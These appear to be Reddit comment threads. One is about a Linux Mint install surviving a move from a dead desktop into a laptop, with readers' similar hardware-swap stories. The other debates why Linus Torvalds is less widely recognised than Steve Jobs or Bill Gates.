(I agree it's annoying when coming across a new project and you need to dig around to find out exactly what it is, but still, they are mostly developed by people in their spare time.  They obviously had other priorities. Don't dis open source maintainers.)

EDIT: lol downvotes. turns out everyone is just here to rant instead of helping find a solution. ¯\\\_(ツ)\_/¯
There's no such paragraph on a Photoshop or Excel page too.
I rarely come across something that bad... can you give some bad examples? Being honest.
Today, Linux surprised me, and in itself, that's surprising. I've been using it since 1998, and switched to Linux as my primary OS around 2005, so I'm pretty familiar with its capabilities. 

Today though, I was working on my main desktop PC, an aging "woodsman's axe" box running an AMD FX6200 6 core, 12GB Ram, Geforce GT720 graphics card, and crucially, an Intel 128GB SSD. It was built from spare or recycled parts, and was getting a bit cranky in its old age, so I ran it with the side of the case open. 

To cut a long story short, I tangled myself in a lead, knocked it over, and tipped part of a glass of water into it. I tried drying it out, but it wouldn't even post, so definitely dead. 

At this stage, I started getting worried. I needed to send the work tonight, and while I'd saved it before killing the box, I didn't have another desktop computer to put the SSD into to salvage it. I did have a couple of ex-corporate laptops though, and I'd been testing Sparky Linux on an old Latitude D630, so I knew it worked (mostly) well with Linux.

Without expecting much, I took the SSD, put it into the laptop, and pressed the on button. After post, the screen went blank for quite a while, and I was about to give up, then the familiar Mint boot logo appeared, followed shortly after by my desktop. I plugged it into the USB wifi stick I'd been using on the desktop, opened the Driver Manager, checked the Broadcom internal wifi, rebooted and was back in business less than 10 minutes after I'd installed the SSD.

Everything worked. I plugged in my external monitor, and finished the job.

In hindsight, I probably shouldn't have been surprised at all. Hardware detection has been extremely good for a long time, but this was just SO painless, it did shake me up a little. But in a very happy way. Thanks Linux!

TLDR: I took an SSD out of a desktop, moved it into a laptop with completely different hardware and a lot less RAM. Everything worked, job got done.
This is one of the aspects I've always appreciated about Linux, but rarely had to use. But when you do need to, it saves your arse - as you found out.

But for a period of about 10 years, my main linux machine went through multiple hardware and software upgrades without ever doing a reinstall. Plug in a new motherboard with the same HDDs, and keep going. Upgrade HDDs by copying online to a new one, reboot and keep going. Rinse and repeat. Software upgrades handled by Debian with a dist-upgrade.

These days I reinstall at the drop of a hat (infrastructure as software, and all that), so I can't say I've maintained that continuity, but looking back over it, it really was quite amazing.
As they say: Microsoft say they invented Plug and Play, and Linux implemented it.
not having a license tied to a particular piece of hardware has its advantages :)
[deleted]
Well that's only true w/ general public distributions.

If I put my Gentoo drive in another computer, chances are nothing's gonna work
This saved my ass in a major way once, too. I was supposed to give a tour of our lab at my university and show off some software we wrote on the only Linux box we had there (and we had to fight for it, too). Literally thirty minutes before it was supposed to start the damn thing craps out on me. I didn't even think for long, my only hope was to get that SSD out of there and into some other machine. So I sprint to get a screwdriver, pop it into another machine and boom - no problemo.

Come to think of it I really should have gotten paid for that.
similar story here
1. installed ubuntu 17.04 on this board http://www.asrock.com/mb/Intel/Q1900DC-ITX/index.asp
and steam with original controller - all working fine. played some simple games, of course such PC was not enough so I decided to upgrade all harddware
2. bought new MB, CPU Ryzen, ddr4 RAM, GeForce 1060 graphich and poped SSD with original ubuntu from installation step #1 in new pc, system started without any problems, just activated proprietary drivers for CPU and graphics, rebooted and there you go. installed new games, job done.

no need to reinstall the system, simple and easy.
I've got an old Samsung 830 that started with Ubuntu 13.04 and has survived in-place upgrades all the way to 17.04.  It has lived in three different laptops (and back to one a couple of times because I needed Firewire briefly).  I also have a USB stick with a full install of 32-bit Ubuntu for the same reason.
Linux worked as expected. The real lesson here is: Open water and running computers don't mix. 

Make computer go poof poof. 
I've been wanting to ask this to someone with loads of linux experience. 
Since you've been using it for 2005: 

What do you think about distributions with long-winded instalations (arch, slackware, gentoo, LFS ...) generally? 
Do you have any experience with them?
As a person who's only ever had a computer that's about half the speed of the one you've posted about, seeing you call it an old timer made me cringe with jealousy. 
How is a 6 core cpu  and 12GB "aging"?  


Linux seems to include all of the fucking drivers by default.  People act like installing Linux is difficult, but compared to installing Windows *without a machine specific driver disk* it is a piece of cake.
This is how the world would be like without patents and corporate greed.
Great to hear! 

Off-Topic: Why are TLDRs not at the top of a post?
You mean you didn't have to phone support to unlock your license because you switched motherboards?
Been there a few times. Really helpful in an emergency.
Same story. Working PC burned down. Just removed SSD from it and put it into the laptop. Everything works fine except for issues with hibernation.
I love that Linux can do this. A while ago, I built a desktop computer (mostly a gaming rig), but because of hardware problems it wasn't done until the day before I had to move. Before the desktop, I had an ancient, tiny (<10in) laptop that had my entire world on it, but it too slow for most things I wanted to do.

A few hours before packing up the freshly-built desktop computer, I got the idea to slot in my laptop's HDD into the desktop. I wouldn't be able to use the thing for another few weeks (shipping) and I had little time left that night, but I was desperate to try it out. I doubted that Ubuntu would run smoothly at all, considering the abrupt change of hardware. 

Turns out, it ran flawlessly. I even had all the right drivers installed, right down to the proprietary Nvidia drivers. For ~45 minutes, the soul of my old laptop flew faster than it had ever known, playing Civ V on 1080p@144hz. Seemed like a fitting way for it to meet its end.
TIL my 4 year old desktop is cranky because of it's old age. 

For backups -- Just make a systemd job that takes your most important folders and 7zips that to gcloud, dropbox, amazon, *. Or use google drive ocamlfuse. If you want to go sophisticated, make an NFS server with FreeNAS and a few big raided drives.  The more you can go back to the 1970s and just use each device as a terminal, the easier your life is. For everything other than games this works perfect.
And then people complain that Linux should have a stable public API. Why?

What we want is for **everything** to work, not make life easier for third party driver developers to not play ball and provide proprietary shit drivers.

Having all the drivers inside the Linux kernel the code is easier to refactor so it works for **everyone**, and it's as simple as possible.

No other kernel can do that.
> TLDR: I took an SSD out of a desktop, moved it into a laptop with . . . a lot less RAM. Everything worked

Regarding the RAM part, that's not really surprising at all. The original computer was enormously over what you'd need for it to function properly. I'm a software developer by day and gamer by night and my primary PC has 4GB of RAM. I'll be upgrading within the next year, but not because it's running subpar. People go so crazy with RAM. (My *secondary* computer which I'm not using has 12GB, so I do have a comparison, but the difference is small and rare.)

[deleted]
I'm surprised you use linux since 2005 but still using mint
Today, Linux surprised me too. I had plugged out my headphones while my laptop was suspended and when I woke it up again and plugged my headphones back in, my left ear piece wasn't working. It's not that they were *both* not working. My *left* one wasn't working. Sometimes you gotta ask yourself... \^\^
You're lucky your initrd had the proper drivers for the disk controller.  Without the proper kernel modules you'd have to boot from a rescue cd, chroot, and run mkinitrd or whatever the modern equivalent is.
That's very awesome, and I'm glad you were able to restore your data! I can only assume that Windows would probably have committed sudoku had you attempted that with it.
I've taken a hard drive with Gentoo compiled for AMD and put it on a much lesser Intel system and everything just worked.
You brought a tear to me eye. Good stuff
This is one of the wonderful things about having a free as in gratis operating system. There's no unsolvable technical problem that prevents Windows from doing this too, and with much older versions (2k and below) you could generally do this without too much of a headache apart from having to manually load the right drivers. The reason it doesn't work is because it would make license enforcement next to impossible. 
Awesome. Glad it worked out for you. :)
Can anyone explain to me how linux is able to do this?  Is it compiled to work on everything out there with vaguely similar processor architecture - and doesn't that mean there is a huge amount of bloat in the compiled binary?  I don't understand how one image can work on hundreds of processors, graphics cards, wifi cards, harddrive controllers etc etc etc.

TIA!
This is similar to one of my very first Linux experiences. Was trying to get an OS installed on an old Pentium III laptop with neither an optical drive or the ability to boot from a USB stick. 

In a genius moment, I decided to try and install Windows XP to the laptop's hard drive using my desktop PC and an IDE <> mobile PATA adaptor. This failed. 

Miserably. 

Blue screen of death and I got to know each other really well that night.

Installed Ubuntu 5.04 using the same jerry-rigged apparatus, loaded the drive back into the lappie, and it booted right up with nary a complaint. And on that night, a new Linux user was born.
So i did that with my new laptop( took my old laptop's  ssd and put in the  new one), but i had problems with apt (i was unable to update/upgrade/install). My question is, can i fix this? or is better to reinstall?
When Windows and OS X can't get the job done, they call Linux.   


Drive portability is pretty damned impressive.  I've experienced this a few times myself.

Useful too with VMs, should that be an option.
I do this all the time. 
I even have several "Environments" (2.5" SSD's) that I swap into a toaster (External USB 3.1 > SATA) to boot from.

Far better than separate computers IMO.
OP, I hate your guts...

> an aging box running an AMD FX6200 6 core, 12GB Ram, Geforce GT720 graphics card, and Intel 128GB SSD

My main desktop machine is a P4 dual core with 4GB ram shared with the video card.  But hey, at least it has a SATA drive.  And I strain the hell out of it... various chats, firefox with four windows and a couple hundred open tabs, thinderbird, some java programs, and occasionally I'll work on some images in GIMP.  I also watch TV shows through VLC.  The only time I really have any issue is when it has to do some heavy swapping because some idiot uploaded a multi-megabyte gifv to imgur, but otherwise linux gets the job done.  Fsck Windows, it could never begin to cope with my daily usage.

FYI I'm running deban wheezy with the Mate desktop.  Good solid OS.  Oh look, one more hour and I'll hit 365 days uptime.
*GNU/Linux
I ran linux as my primary OS for a while, and I had one Kubuntu install migrate to no less than three different motherboards. It was eerie how painless it was. Can't do that with windows, no siree. 
Unless you're using Broadcom or nvidia primus, hardware detection and driver support has been really good for a while now.
This would be one very big downside to rolling your own kernel.  I generally include only the drivers that I need, so I would be looking at booting into a rescue environment to compile a new kernel. :-\

It is pretty cool though that it just worked for you though!
Love it ;)
I never even imagined you could do that. But it makes sense...
Yup. I've had good luck with this in VMware vSphere (ESXi), but generally Linux is even better with hardware detection and hardware upgrades. Linux is quite amazing.
Awesome story and very inspiring.


I never leave home without my Linux SSD. I have one of these 5.25" bay SSD docks, so I just pop it out of my desktop and into my laptop. Before I had to change the graphics drivers because my desktop has Nvidia while my laptop has AMD, but with the new libglvnd it works flawlessly.
Around 2009, a bunch of unfortunate events cascaded upon each other, of which included my laptop becoming unable to charge due to a soldering issue. It was effectively dead. I had the idea to get a USB enclosure so I could continue using the data, but not only could I use the data, I could plug the entire thing into any computer, boot from USB, and use the system that was previously on my laptop. It worked more or less flawlessly. I used it in this manner until I could find a more permanent home for that data. I was surprised by this too, but it saved my butt and I'm grateful for it.
This is one of the aspects of linux which impressed me.
 I remember 2 years ago, I was using Ubuntu on this old Dell pc. The power supply blew up damaging the whole motherboard.
 I took out the HDD and swapped it in another pc. It just worked! I mean no issues whatsoever and it didn't slow down as well.
 Love you devs and admins for your great work.
[deleted]
Windows 7 is really the main OS that complains about SATA controller drivers. 8 and 10 handle HDD/SSD transplanting much better.

Linux will always go out of its way to boot, even if you need VGA graphics or a fallback kernel to make it happen.
This sub really needs a "circlejerk" tag or flair or whatever it's called.
try doing that on windows lol, blue screens, disk/gpu driver panics, license crap....
" I don't understand how the kernel works, therefore it's surprising. "
Compare that to Windows. Don't you fucking dare to change a component in *your* computer because you will have to ask Microsoft nicely for permission to keep using your computer.

I am mesmerized that people accept that.
Yeah I wish Windows could do this too. 

I move my primary SSD (Debian testing) freely between my desktop and two laptops (different sizes) so that I don't need to maintain several installs, sync files between them and so forth. 

The only thing I needed to do was add a couple of scripts to switch back and forth between Intel and Nvidia GPUs.
Shit like this is why I don't run a custom kernel with minimal modules or only the necessary stuff enabled, and why I usually don't bother to compile with march=native.  It's really nice to be able to stick that hdd in whatever and have it still work.
Squeezed a few more years out of my ancient HP laptop, thanks to Linux Mint.
I had to swap my media server to newer hardware. I thought I should try to re-install the OS since it was on a separate HDD. But was like well let me see if it boots. To my surprise it did, and it told me gathering drivers for new hardware. So I did my happy dance for about 30 minutes because it was so impressive. 
Many years ago (some time between 2005 and 2010; I don't know exactly when), I had gotten a new computer. My old computer dual booted Linux and Windows, but I was mostly a Windows user.

When I moved my hard drive over, I expected most things not to work but for some things to work.. And was surprised to find that Windows basically *refused* to work, and Linux worked flawlessly.

I was in junior high or high school, and not terribly Linux proficient. That Linux install to begin with was the result of me reinstalling over and over again simply because I forgot to include a package I wanted (I had no idea how to use the package manager).

The fact that *switching PCs* was so flawlessly painless on Linux, but so harshly disallowed on Windows, forced me to basically be Linux-only for a while until my dad got me a Windows install disc.

After that I doubled down on learning more of the ins and outs of Linux, deciding to try to fix problems *without* reinstalling if I could. While this did mean there were periods where I had to use my parents' computers since I'd borked mine, over time I actually learned how to fix most problems without a full re-install (even if I *did* have to fire up a live CD).

So, yeah. Even back when you switched to Linux as your primary OS, this type of thing was possible - and was what eventually lead to me switching over to it being *my* primary as well. Linux is the absolute king of recovering after a fall, and I love it for that.
Someone doesn't compile their own kernel.
Yes, I have to agree... I just switch hard drives whenever something happens and I am yet to find a computer that gives me any hassle regardless how 'aged' it might be. 
>It was built from spare or recycled parts, and was getting a bit cranky in its old age, so I ran it with the side of the case open.

What are you hoping to accomplish with this besides worse airflow and potential accidents?
I had a similar experience this week. I did some really stupid things which ended up replacing my /etc/passwd, /etc/shadow  and similar files with default files. I tried to fix it but was unsuccessful and decided to reinstall everything. My computer has an SSD and 2 harddrives and before reinstalling, I copied all of /home to one of the harddrives.

I did that mostly as a backup, but after reinstalling everything, I figured I might as well copy the backup to my newly reinstalled SSD. It took a little while, then i chowned all the files to my new user and surprisingly everything still works after reinstalling some packages.

I don't think that would have been possible on windows, though I suppose the same thing could be said about accidentally overwriting important system files :P
You are more careful than I am! I keep two laptops with the same data on them in case such a thing happens so I can immediately get back to work
Ahhh shit I forgot all about that stuff somehow! Excellent reading and thanks for sharing for me and everyone else. I just want to avoid "this distribution is dogshit" without the supporting evidence. Let's not just throw stones!
I'm an oldster, too, and it's still surprising to me how well it works these days. Used to be that unless you had matching chipsets, even if you got past the bootloader, the thing would kernel dump.
ya get to upgrade now
I find it's really hit and miss.  I have never ever ever had any luck myself transplanting a Linux install to another computer.  Heck, even just changing the video card usually results in no-boot situation.  There's probably ways to recover but it's faster to just clean install than try to figure it out especially if your main machine is down and your only way to google stuff is on a phone. 
If that had been Windows, spend half a day finding drivers, downloading them, installing them, rebooting, and then re-activating the license because of the changed hardware.
I wish I could use Linux. Right now the only machine I have seems to be the one laptop model in the world that doesn't have drivers and just getting Linux to boot is a nightmare. I long for the day when I can replace my macbook or just build a cheap PC and get back off windows.
This that we take for granted isnt possible in the windows world. You cant switch disks and expect it to work
Yup. I have switched components in my laptop multiple times including nics. It always auto detects the hardware. Meanwhile on Windows.....


Fuck windows.
help us out in https://ask.sysadminonlinux.org since we are trying to help out new folks.
It also surprised me when my scanner stopped working after I've unmounted a portable hard disk. Luckily, closing and restarting Simple Scan solved the issue. 
Used this lots of times, both for windows and linux, only thing i remember with windows is that all the old drivers stays with the install, unsure how linux handles this.
“No problem, bro. I come with *every driver ever.*”
Linux also suprises me, but not in a nice way:

let's take third party software - git and node:

* installing: to install git and node I need... root privileges. What?

* versions: somehow, somehow, third party applications, **not** an OS component, their versions are tied to OS version. Ubuntu 17.04 has one version frozen for applications, 16.10 has other version frozen, etc. What?! Fucking what?!

First point is just piss poor UX, okay, whatever. But second point boggles my mind. No one. No one. No other OS does that. Fucking what? Was surprised, because... fucking what? Windows, macOS, iOS, Android, FreeBSD, OS/2, DOS, etc, doesn't do that. You go and download newest version for your OS from store, etc. Fucking what?!
Hah, thanks for loading the drivers at boot.... Unlike some other OS... 
Have you tried using other distributions?  Usually people with 10+ years experience use something other than Mint.  Debian is a solid choice.
And 'the work' being an email that you could have sent from a phone in less than 30 seconds?

Story is bullshit.  
Come to think of it, I think the invention of the Linux kernel has definitely changed the world.

On the desktop market, Linux-based systems constitute less than 3% of users. But that number is likely to be significantly higher if you take into account the people who actually care about computing in any capacity. It would rise by at least three times, I reckon, if more games had native Linux support.

Now, on the mobile market, Linux-based systems are installed on around half the phones in the world.

Most servers running the Internet are using a system based on the Linux kernel.

How come Linux Torvalds is not as widely recognized as Jobs or Gates? He's arguably done more than them, and that's without creating a gigantic chain of proprietary software/hardware to flood the market.

Why do you think that's the case? Shouldn't he be at least as well recognized as them?

What do you think?
gives me Dennis Ritchie flashbacks, I still remember people carried out peace gatherings and stuff for Jobs but nothing for Dennis, both died around same time.
Because they had a high profile public image, talking to the press with millions of marketing dollars behind their every utterance. Linus doesn't. Their actual achievements (by which measure Torvalds dwarfs the other two) are irrelevant.
People who know of Linus' work appreciate him. And I hope he knows that
Same situation as The Woz
I think Linus would appreciate it more if you spelled his name properly. 

That’s a good start.
Because Linus isn't a billionaire, and modern culture uses wealth and commercialization as the main benchmark of succes and importance?
Love Linux a lot, but the saddest thing is that people usually associate Linus only with Linux, and completely forget or ignores that he also created git. I mean, he fucking created git. And also Linux kernel. He’s like a god in the industry and nobody cares.
Perhaps because some people don't even know the difference between Linus and Linux.
Talks about a guy not being appreciated, doesn't even bother to spell his name right, lmao
I think the world has plenty of well-respected individuals within particular fields whose accomplishments may not necessarily be that well understood to a larger audience.

Steve Jobs and Bill Gates were prominent public figures whose companies sold products directly to consumers. Although Linux powers the entire global communications infrastructure, this is something generally invisible to most people.
If linus is not appreciated, look at the poor Richard Stallman....
One word only: money. Linus did not enrich himself as much as the others did.
He also created git which I think is just as big a deal as Linux
Cause 2/3 of those people got rich off it, and that's what capitalism cares about
"not as appreciated"?

Less well known, because Bill Gates and Steve Jobs became super -rich, had market dominating software that people could see directly on their desktops and phones.

But "appreciated"?

I would say that amongst the many that do know Linus Torvalds he is way more appreciated.

Behind those phones and desktops the world runs on Linux. On gadgets, via servers to supercomputers.

And he threw that out for free and has maintained the worlds most important kernel for decades.

And in between he created the source control system that murdered all the other source control systems.

(In both cases not his work alone, but he started Linux and git).
Who is Linux Torvalds?
No success in personal computing. Linux desktop is really not common so most people just stick with their prescribed windows. And then add to that that most people don’t know a lot about servers or the web so they won’t know Linux from there either. Linux makes no “visible” difference to people’s lives. The web works and most don’t think about the machines powering the backend and the OS it runs.
Because what Jobs and Gates did was to bring computing to the masses. Linux has certainly had a major impact on computing, but hardly the same kind. Without Jobs and Gates, Linux would not have been able to create an entire industry, but without Linux that industry would have still existed.
The real question is WHY is Jobs appreciated.
I think Torvalds is far more respected within the Linux, or open source, or maybe even software engineering community. But in general - Jobs was associated with the iPhone, a popular consumer product. Gates is associated with Windows, ditto. Most people don't think much about Linux, despite its importance.
Because the average person has never heard of Linux let alone Linus.
> why

Gates has a dedicated PR team.  Linus does not. 

It is that simple.
More than just the capitalist argument, Linux Torvalds’ creation isn’t meant to be front and center of attention.

Windows is designed to make your digital life easier and more integrated. All of the default software out of the box is indicative of that. MacOS is same. (As is Android, iPhone)

There are generations of people who are thankful for all of the first party applications provided by Samsung, LG, Apple, Microsoft, etc. They have loyalty to these companies and they won’t hesitate to repurchase in the future. 

That’s not Linux. The Linux kernel is meant to be built atop of. It’s the slab upon which several homes have been built; but the majority of them are functioning in headless modes in a cold closet somewhere in the world. No one thanks Linux for Ring Cameras — they thank Ring. No one thanks Linux for PlayStation — they thank Sony. No one thanks Linux for General Motors car infotainment systems — they thank GM. 

Linux, by design, isn’t made to get credit. Consequently, neither is its creator Linus “Linux” Torvalds
To put it simple: I think Linu\*\*s\*\* Torvalds wrote code and gave it to the world, realizing that it would be other people's work that would make it great, and that they should benefit from it... And then he went out and got employed like a normal, beneficial member of society. People like Bill Gates and Steve Jobs go take other people's work, tout it as their own and take money for it as if they earned it all themselves, and THEN, rather than get employed like normal, beneficial members of society, they use that money made on other peoples work, to make other people come work for them even more in a vicious cycle we call capitalism.

Basically, the difference is that Linus simply wanted to give to the world. Bill Gates and Steve Jobs were more interested in what they could TAKE from the world.
Steve Jobs is appreciated by iPhone normies and hustle culture wannabes. Torvalds and Ritchie are appreciated by engineers. The former vastly outnumber the latter.
Because he actually invented it, meaning - he did the engineering. And engineers are not as appreciated as sales people
Cause his name is not Linux dumbo
In my world Linus is much more respected than Bill or Steve.
If his biography is correct, Linus Torvald was and is simply not interested about public attention.
He made enough money to do whatever he wants for the rest of his life. Albeit his wife and kids can enjoy a pretty normal but comfortable life. They can go as a family to a restaurant, visit some event or go on holiday without being hunted down by paparazzi and the need for privat security. 

Linus can do privately as much stupid things as he likes, without risking a social cryout for even the slightest misbehave. He does what he loves mostly from home having his family around him. 

He is not just a computer genius but obviously he understood the essence of "Carpe diem". 

TLDR: he prefers to live a pretty normal life, over being a media-attention seeking idiot.
What Linus changed is version control. git is ingenious, and everyone who's not using it is not using it for historical reasons and considers this technical debt.

Linux is basically a free Unix clone and a community product. If Linus hadn't started it, the chance is high that someone else had done it. If all the people who worked on Linux had worked on Gnu Hurd instead, maybe Hurd would be as successful as Linux is nowadays – or BSD. Or Solaris.

So I think it's fair to say that Linux didn't change the world as much Apple smartphones or IBM computers with DOS/Windows did. Simply because Linux mainly stuck to existing standards and didn't bring that many new concepts.

Maybe Stallman changed the world a little bit more in this regard.
when's the last time you've seen a billboard with tux on it?

But to be fair ask yourself this: who founded IBM? Who designed the x86 architecture?

There are many things that are far more impactful than a ln edn-user focused operating system or a designer trashcan, yet their inventors aren't really recognized because well, Jane Doe doesn't care about the OS serving her Facebook.
Jobs and Gates were salesmen who sold themselves to the public. Linus is an engineer who builds things.
> How come Linux Torvalds is not as widely recognized as Jobs or Gates? He's arguably done more than them, and that's without creating a gigantic chain of proprietary software/hardware to flood the market.

It's not for XNU or NT that Jobs and Gates are appreciated by the public.

I guess, isn't putting Linus in this question and leaving out people like Dennis Ritchie (like the earlier replies mentioned), RMS, or the BSDs (which are actually full operating systems) a bit ironic?
There's one guy who did possibly more than all of them and no one here knows: Compaq's Rod Canion, who pretty much wrestled the PC out of IBM's hands and made it a truly open platform.
Because he's not as rich. 

Under capitalism fame and wealth are intertwined.
It's because Steve Jobs and Bill Gates "changed computing" for the consumer. Linus, in regards to Linux, changed computing largely for the enterprise. Linux is also only a component that a vast majority of consumers know nothing about, whereas Microsoft and Apple are more holistic. Windows is a whole OS and Apple have created whole sets of software and hardware. 

In other words, Bill Gates and Steve Jobs have been more influential in the public's eye by way of Microsoft and Apple products, while most people have no idea what Linux even is.
Because normies don’t know what Linux is or why it’s important.
This might be a hot take but I don’t think Linus has really been that impactful compared to jobs or gates. At the end of the day Linux is just a kernel, if Linux didn’t exist we’d just be using a different kernel but not much else would change. The invention of the iPhone or windows has been far far more impactful than Linux.
The answer to that is, in my opinion, easy.

Linus created something massive and world changing, and he gave it away for free, and fought to keep it free for all who wanted it. 

He didn't gain notoriety by growing a fortune, by wielding great power and influence, his software flies under the radar even while running a lot of the items that we take for granted every day.

if all the items running linux had to have a "Powered By Linux" or "Linux" in any way, perception would change.
I think Richard Stallman has made bigger contributions to Linux than Linus Torvalds. 

Linux is nothing without the GPL license. The reason that Linux -the kernel- or the GNU Linux family of operating systems are successful is the GPL license. If it wasn't for the GPL, Linux would not have gotten as big as it is today.
Same reason Dennis Ritchie's death, which was about a week before Steve Jobs', was pretty much unknown to most of the world. Yet we got constant news stories, documentaries, and even Hollywood movies about Steve Jobs after his death.

Bill and Steve made lots of money as ruthless Capitalists. The media (which extends to the general populace) cares about people who make lots of money via Capitalism. It shouldn't be this way, but it is.
personally I would `s/Linus Torvalds/Richard Stallman/`

And ask the same question ;)

If you want the answer: Bill Gates forced everyone to use Windows, they didn't choose it. Every business, school (certainly outside of the US where Apple was relatively unknown).

Bill Gates had his brand, and pushed it hard. TV, Radio, magazines, everyone wanted the next Gates interview as everyone had Windows because Gates made sure everyone had to have Windows, then Office, then Internet Explorer and so on.

Linus Torvalds did none of that. Nobody was forced to have Linux on their PC. Interviews etc were directed ar an audience that already knew of Unix. The average Joe heard about this "Linux hacker thing" in a news item on TV. Maybe talked to the kids about hacking being bad.

He didn't go full steam ahead, bursting through school gates to deliver Linux, bursting into the prime time TV chat shows because he didn't have the same drive as Gates and the prime time chat shows want what makes money, not some strange Finnish guy who does computer stuff.

Even today, computers = a device to run Windows.

So there is my answer. In fact it gets even more obvious when you see that Linus Torvalds is seen as above Richard Stallman yet Linus just made a kernel, not the operating system, but then he also has a different definition of what an Operating System is vs Stallmans definition.

Suffice to say, there would be no Linux, kernel or otherwise without Stallman, because the GPL wouldn't exist, GCC wouldn't exist, Linus was well aware of the GNU project and that his OS attempt would not be "big like GNU", Emacs and it's clones wouldn't exist, and as Open Source was an attempt to redefine Free Software for business use it is doubtful that the main driver behind any exposure Linus got, which was the Open Source sidevof things would exist either.

Linus would still have used Minix and still would have wanted to make something better, but with no gcc, no gnu, no gpl, no open source I argue that Linux would have ended up as an alternative kernel for a BSD, or perhaps Minix itself.

So taking your question as to why Linus isn't as well appreciated as Gates, why is Stallman not more appreciated as Linus? Gates towers above them both. I guess because of the reasons I stated, drive, ambition, dodgy dealing and tactics made Gates a household name even to people who simply wanted to play minesweeper.

Only us geeks hold Linus, Stallman, Perens, Raymond with any celebrity.
Kinda hard to stand out when you're working with Richard Stallman. Also, not American (so no patriotism), not interested in money, never went to court for monopolistic behavior, never tried to get the spotlight. If you want to talk about people that should be more well-known, Dennis Ritchie is a big one, he invented the C Programming Language, which is the basis of Linux and inspired most programming languages created ever since like Java, Python, C++, etc. He's also one of the creator of Unix, which is still the basis of macOS and BSD, and directly inspired GNU/Linux (small reminder, GNU means "GNU's Not Unix").
I'd personally argue that Bill Gates and Linus Torvalds have done a heck of a lot more for computing than Steve Jobs did, yet ironically Steve Jobs is by far the most recognizable. I was showing a family friend who knows nothing about computers some of the stuff I was working on and she said something like "You're going to be the next Steve Jobs", which I found funny as Steve wasn't much of a programmer and was only really a hype man for what Steve Wozniak was making. 

So my point is that these 3 aren't necessarily wel-known among the general public for their programming or engineering prowess, but for how much they put themselves out there and how charismatic they are.
Linus Torvalds is responsible for the Linux kernel.  Richard Stallman was instrumental in creating the GNU project which is a major part of what we know as Linux.

Linus provided a piece, but it's the community that made and continues to make open source solutions possible.
Who are Bill Gates and Steve Jobs?
Gary Kildall doesn't get recognition either, QDOS (the thing Microsoft bought and called "MS-DOS") was a clone of CP/M and Gary made that by himself in a cave with a box of scraps.
He is well recognised within the community of people who know what Linux is. For people who don't know what Linux is, they don't know who Linus Torvalds is as well.
I think Linus is up there with Dennis Ritchie and Tim Berners Lee for the importance he has had on computing generally. Think about how many companies that wouldn't be if Linux wasn't a thing. Google quite literally owes its existence to the availability of Linux. The vast majority of the internet runs Linux, the vast majority of phones run Linux, even devices that were never expected to run Linux like the Mars rover are running it. Linux as a contribution to the world has been huge.
r/linux \- 756k members

r/wallstreetbets \- 12.3 miliion members (degenerates)

Just to add some perspective of Reddit and TEH CAPITALISTZ

There is Apple stock, and MS stock. It's that simple. How did that happen? Because both companies made and to continue to make computing accessible to people who don't care about the GNOME project. Because they don't have to. 

They don't have to care about devs leaving projects because of Adwaita or some shit. All they care about is how to get apps and services. On devices that actually work, unlike the Pine Phone. 

They don't want to have people shout "READ THE GODDAMN WIKI!" when their OS breaks. They spent money on hardware and software. Why? Because what's being sold off of shelves is supposed to work, and brand loyalty is a thing in case anyone doesn't realize that simple concept. 

People that resent success probably haven't achieved much of that on their own, and Torvalds himself can come off like a very prickly person, but he's not a total Marxist either. He just doesn't sell hardware to own that percentage of the marketshare, or have OEMs reluctant to use Linux to ship on their hardware because of devs leaving projects because of fucking Adwaita.
> Linux Torvalds
The same reason Steve Jobs and Bill Gates are better known than Lady Ada, Charles Babbage, and Turing. The world doesn’t care about who contributes the most to computing. It only cares about who’s face is at the front of it.
This is kinda easy answer. The situation is the same when you think on Alan Turing, he literally invented computers but a small percentage of people know him ou what he did and that is because he didn't did a direct impact in their lives. If you think about it they "recognize" more Bill Gates and Steve Jobs because they were the ones who presented to this people a product that would change their lives, but in the group of computer scientist and people who really like the IT topic knows and recognize not only Alan Turing and Linus Torvalds but Bill Gates and Steve Jobs too. But that's just my two cents :)
 he's not incomprehensibly wealthy
Their personal celebrity is/was part of the brand of their firm.  I'm sure that Bill Gates, Steve Jobs, Michael Bloomberg, etc each have their own publicist to manage their public image.

Possibly even Linus Torvalds has his own publicist, though I don't think being in the limelight is at all one of his priorities.

There are many luminaries when it comes to Linux (and the entire open source movement).  Linus Torvalds is one of them, but so are: Richard Stallman (GNU, FSF) , Andrew Tanenbaum (MINIX) , Ken Thompson, Dennis Ritchie (Unix), etc.

Bill Gates and Steve Jobs deserves a lot of credit also.  If not for them, the entire world of computing would still be in the IBM mainframe-dominated world.  They deserve their fame.  Good for them.
Steve Jobs was a salesman.  He couldn't change flashlight batteries on his own.
Jobs, Gates, and their respective companies delivered more functionality to the general populace and got rich, that's why they're well known. Bell Labs, Xerox PARC, MIT AI Lab, etc indispensably contributed 1000x more to the practice of computing, but they didn't ship a computer into every living room and pants pocket. 

The downside of public naivety is the prevalence of walled-gardens and locked down content delivery pipes, and it'd be a miracle if such a trend were reversed. That is infinitely more important than our pioneers being as recognized as a Kardashian or Windsor; I doubt they had an overpowering desire for such fame.
Jobs was a celebrity salesman, & Gates is a celebrity tycoon, he was 'the richest man in the world' for a long time. So they were taken up by the celebrity culture gossip, bullshit mythologizing & hype; I don't think it's through an appreciation of their 'contributions' that they became household names.
Linus (or Ritchie, et al.) just wouldn't be fodder for that kind of mass media stupidity. People who are able to appreciate his contributions do so for the right reasons.
> How come Linux Torvalds is not as widely recognized as Jobs or Gates?

He didn't monetize his creation well enough and become a billionaire worthy of worship.  Most non-linux users don't really have a way to quantify his contribution to the world and nearly all non techies have the same issue.  These people glance at the stats and say he contributed $150m worth, so clearly his impact on the world was less than that of Kim dotcom and he doesn't even hold a candle to Kim Kardashian!
How about Paul Allen who did most of the work and was shafted by Gates at every opportunity?

How about Steve Wozniak who did most of the work and was shafted by Jobs at every opportunity?

America idolizes evil billionaires.  I don't quite understand how that works but there it is.
Those two are largely acknowledged as menaces to society, especially Bill Gates, I don't think that Linus would want to be in that company.
Who is  LINUX Torvalds?  Did you mean Linus?
I mean, if you can't even get his name correct...
Linus is definitely appreciated amongst all of us nerds.
Because he didn't make it a business and Linus actually worked. He contributed to a part of a whole.

Gates didn't do much development after Microsoft BASIC and DOS, he only directed.

Jobs only did some development for Atari then stayed on the business end of things while Wozniak made the Apple 1, Apple II, and the disk drive happen

I'd compare Linus to Wozniak rather than Gates or Jobs
The almighty dollar is to thank for this discrepancy in appreciation.

What's crazy, though, is to consider the actual monetary value that Linus has contributed to the world economy by releasing Linux and git under the GPL. I'm not sure if it could actually be calculated, but it would dwarf that of Gates and Jobs combined.
Linus isn't exactly known for his massive "LOOK AT ME" type marketing like Gates or Jobs.

